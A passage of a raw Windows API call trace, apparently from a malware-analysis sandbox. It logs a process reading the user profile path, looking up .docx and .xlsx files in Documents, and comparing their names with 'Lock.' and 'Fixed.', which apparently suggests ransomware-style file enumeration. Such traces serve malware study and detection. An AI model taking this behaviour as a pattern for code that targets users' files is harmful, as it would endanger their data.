(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.387] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0265.389] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/MzqysNw1q1np8jj.docx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx", lpFilePart=0x8bf658*="MzqysNw1q1np8jj.docx") returned 0x3c [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0265.389] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MzqysNw1q1np8jj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mzqysnw1q1np8jj.docx")) returned 0xffffffff [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0265.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0265.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oh6dPV4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h6dPV4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6dPV4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dPV4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PV4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0265.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0265.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oh6dPV4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h6dPV4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6dPV4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dPV4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PV4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0265.391] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0265.392] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0265.392] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0265.392] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0265.392] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.392] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.393] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0265.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.393] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/oh6dPV4.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a565b20, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0xb5d49130, ftLastAccessTime.dwHighDateTime=0x1d4c95f, ftLastWriteTime.dwLowDateTime=0xb5d49130, ftLastWriteTime.dwHighDateTime=0x1d4c95f, nFileSizeHigh=0x0, nFileSizeLow=0x2a8f, dwReserved0=0xa340047, dwReserved1=0x282a8, cFileName="oh6dPV4.xlsx", cAlternateFileName="OH6DPV~1.XLS")) returned 0xaa5760 [0265.394] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.394] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.396] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.396] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.396] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.397] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.397] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.397] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.397] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0265.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.398] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.398] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 